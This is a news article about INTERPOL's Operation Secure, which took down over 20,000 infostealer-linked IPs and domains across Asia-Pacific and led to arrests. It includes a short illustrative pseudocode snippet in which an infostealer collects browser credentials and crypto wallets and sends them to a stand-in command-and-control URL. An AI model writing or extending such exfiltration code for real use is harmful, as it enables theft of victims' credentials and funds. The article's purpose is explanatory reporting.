Interpol Dismantles 20,000 Malicious IPs and Domains Tied to 69 Malware Variants

INTERPOL’s Operation Secure has seen the takedown of more than 20,000 malicious IP addresses and domains associated with infostealer malware.

Law enforcement across 26 countries collaborated to dismantle cybercriminal infrastructure, marking a significant step forward in the fight against digital threats in the Asia-Pacific region.

Operation Secure: Regional Collaboration Meets Targeted Takedowns

From January to April 2025, law enforcement agencies across Asia and the Pacific conducted extensive operations to locate servers, map criminal networks, and execute targeted takedowns.

INTERPOL coordinated closely with leading cybersecurity firms Group-IB, Kaspersky, and Trend Micro, leveraging their advanced threat intelligence to produce Cyber Activity Reports.

These reports provided critical, actionable intelligence to cyber teams, leading to the disruption of 79% of identified suspicious IPs.

Operation Secure was executed under the banner of the Asia and South Pacific Joint Operations Against Cybercrime (ASPJOC) Project.

The participating countries included Brunei, Cambodia, Fiji, Hong Kong (China), India, Indonesia, Japan, Kazakhstan, Kiribati, Korea (Rep of), Laos, Macau (China), Malaysia, Maldives, Nauru, Nepal, Papua New Guinea, Philippines, Samoa, Singapore, Solomon Islands, Sri Lanka, Thailand, Timor-Leste, Tonga, and Vanuatu.

Among the major outcomes:

• 41 servers seized
• Over 100 GB of data confiscated
• 32 arrests made globally
• Over 216,000 victims and potential victims notified

Spotlight on Infostealer Malware: Technical Mechanisms and Impact

Infostealer malware has become a primary tool for cybercriminals to gain unauthorized access to victims’ networks.

These malicious programs extract sensitive information from infected devices (often referred to as ‘bots’ or compromised endpoints), including browser credentials, passwords, cookies, credit card details, and cryptocurrency wallet data.

Although full source code is rarely released, here’s a simplified pseudocode highlighting the process by which an infostealer might collect and exfiltrate data:

pythonimport os
import browser_stealer_module
import data_exfiltration_module

# Collect browser data (credentials, cookies, etc.)
browsers = browser_stealer_module.find_browsers()
stolen_data = browser_stealer_module.collect_data(browsers)

# Collect cryptocurrency wallet information
wallet_data = browser_stealer_module.find_wallets()
stolen_data.update(wallet_data)

# Send collected data to command-and-control server
data_exfiltration_module.send_to_server(stolen_data, "https://malicious-server.example.com")

Note: This is illustrative only; real infostealers are far more complex and obfuscated.

Once harvested, logs from infostealers are sold on underground marketplaces, enabling secondary attacks such as ransomware, data breaches, and business email compromise (BEC) schemes.

These logs serve as the initial foothold for more destructive payloads.

Major Arrests and Technical Triumphs

Authorities in Vietnam, Sri Lanka, and Nauru conducted multiple raids as part of Operation Secure:

• Vietnam: 18 suspects arrested, including a group leader with VND 300 million (USD 11,500) in cash, SIM cards, and business registration documents. This pointed to a sophisticated scheme for opening and selling corporate accounts.
• Sri Lanka and Nauru: 14 suspects arrested, 12 in Sri Lanka and two in Nauru; 40 victims identified.
• Hong Kong: Police analyzed over 1,700 pieces of intelligence provided by INTERPOL, identifying 117 command-and-control (C2) servers across 89 ISPs. These servers acted as hubs for launching phishing, fraud, and social media scams.

Command-and-control servers are the backbone of cybercriminal infrastructure, enabling attackers to control infected devices and orchestrate large-scale campaigns remotely.

The takedown of these servers severely disrupts the operational capacity of cybercriminal groups.

The Broader Cybersecurity Context

The success of Operation Secure highlights several key points for the cybersecurity community:

• Collaboration Works: Public-private partnerships and international law enforcement coordination are highly effective in disrupting cybercrime networks.
• Intelligence Sharing is Critical: Cyber Activity Reports and real-time threat intelligence allow for rapid, targeted responses.
• Infostealer Malware is a Gateway: The initial foothold provided by infostealers enables a cascade of secondary attacks, underscoring the need for early detection and mitigation.

INTERPOL’s Operation Secure represents a significant milestone in the fight against global cybercrime.

By dismantling over 20,000 malicious IPs and domains linked to at least 69 malware variants, law enforcement has sent a strong message: coordinated action and intelligence sharing can and will save thousands from the devastating consequences of infostealer-driven cyberattacks.

As Neal Jetton, INTERPOL’s Director of Cybercrime, stated:
“Operation Secure has once again shown the power of intelligence sharing in disrupting malicious infrastructure and preventing large-scale harm to both individuals and businesses.”

With cyber threats continuing to increase in scale and sophistication, the success of Operation Secure provides a blueprint for future international cybercrime responses.